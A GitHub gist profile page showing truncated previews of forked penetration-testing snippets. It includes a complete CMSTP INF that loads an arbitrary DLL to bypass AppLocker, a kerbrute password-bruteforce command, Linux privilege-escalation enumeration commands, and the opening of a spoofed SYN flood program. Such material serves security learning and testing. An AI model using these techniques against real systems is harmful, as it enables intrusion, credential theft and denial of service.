Skip to content

Instantly share code, notes, and snippets.

View x0xr00t's full-sized avatar
🎯
Focusing

Patrick x0xr00t Hoogeveen x0xr00t

🎯
Focusing
View GitHub Profile
@x0xr00t
x0xr00t / pentestlab-dll.inf
Created October 21, 2021 13:01 — forked from netbiosX/pentestlab-dll.inf
CMSTP - Arbitrary DLL execution locally and remotely and SCT for AppLocker Bypass
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Users\test.PENTESTLAB\pentestlab.dll
@x0xr00t
x0xr00t / htb.md
Created March 21, 2021 23:16 — forked from AvasDream/htb.md
Cheatsheet for HackTheBox

Purpose

Cheatsheet for HackTheBox with common things to do while solving these CTF challenges.

Because a smart man once said:

Never google twice.

Linux General

@x0xr00t
x0xr00t / Active Directory Attacks.md
Created February 20, 2021 03:23 — forked from ssstonebraker/Active Directory Attacks.md
Active Directory Attacks #oscp
@x0xr00t
x0xr00t / kerberos_attacks_cheatsheet.md
Created January 3, 2021 07:03 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@x0xr00t
x0xr00t / reclaimWindows10.ps1
Created September 18, 2020 22:08 — forked from alirobe/reclaimWindows10.ps1
This Windows 10 Setup Script turns off a bunch of unnecessary Windows 10 telemetery, bloatware, & privacy things. Not guaranteed to catch everything. Review and tweak before running. Reboot after running. Scripts for reversing are included and commented. Fork of https://github.com/Disassembler0/Win10-Initial-Setup-Script (different defaults). N.…
##########
# Tweaked Win10 Initial Setup Script
# Primary Author: Disassembler <disassembler@dasm.cz>
# Modified by: alirobe <alirobe@alirobe.com> based on my personal preferences.
# Version: 2.20.2, 2018-09-14
# Primary Author Source: https://github.com/Disassembler0/Win10-Initial-Setup-Script
# Tweaked Source: https://gist.github.com/alirobe/7f3b34ad89a159e6daa1/
# Tweak difference:
#
# @alirobe's version is a subset focused on safely disabling telemetry, some 'smart' features and 3rd party bloat ...
import socket
import random
import os, sys
import threading
if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = ' clear'
else:
clearing = 'cls'
os.system(clearing)
@x0xr00t
x0xr00t / linux_privesc
Created September 17, 2019 10:39 — forked from sckalath/linux_privesc
Linux Privilege Escalation Techniques
// Determine linux distribution and version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release
// Determine kernel version - 32 or 64-bit?
cat /proc/version
uname -a
uname -mrs
@x0xr00t
x0xr00t / openvas-automate.sh
Last active August 4, 2019 16:05 — forked from mgeeky/openvas-automate.sh
OpenVAS automation script.
#!/bin/bash
#
# OpenVAS automation script.
# Mariusz B. / mgeeky, '17
# v0.2
#
trap ctrl_c INT
# --- CONFIGURATION ---
@x0xr00t
x0xr00t / prepare-kali.sh
Created April 24, 2019 09:26 — forked from mgeeky/prepare-kali.sh
A script that prepares Kali by collecting many useful tools of trade in /root/tools directory, installing requirements, seting them up, preparing .bashrc etc.
#!/bin/bash
# Well, entire Kali installation assume that we are normally working as root on our Kali.
# I know that assumption sucks to its root, but I wanted to avoid every "permission denied" issue and I was too lazy
# to get it done properly as a non-root.
if [ $EUID -ne 0 ]; then
echo "This script must be run as root."
exit 1
fi
@x0xr00t
x0xr00t / ssyn.c
Created December 11, 2017 07:45 — forked from z0mbiehunt3r/ssyn.c
Spoofed SYN by eKKiM - ssyn.c
/*
Spoofed SYN by eKKiM
Educational purpose only please.
Compile with
gcc syn.c -pthread
*/
#include <stdio.h>
#include <stdlib.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>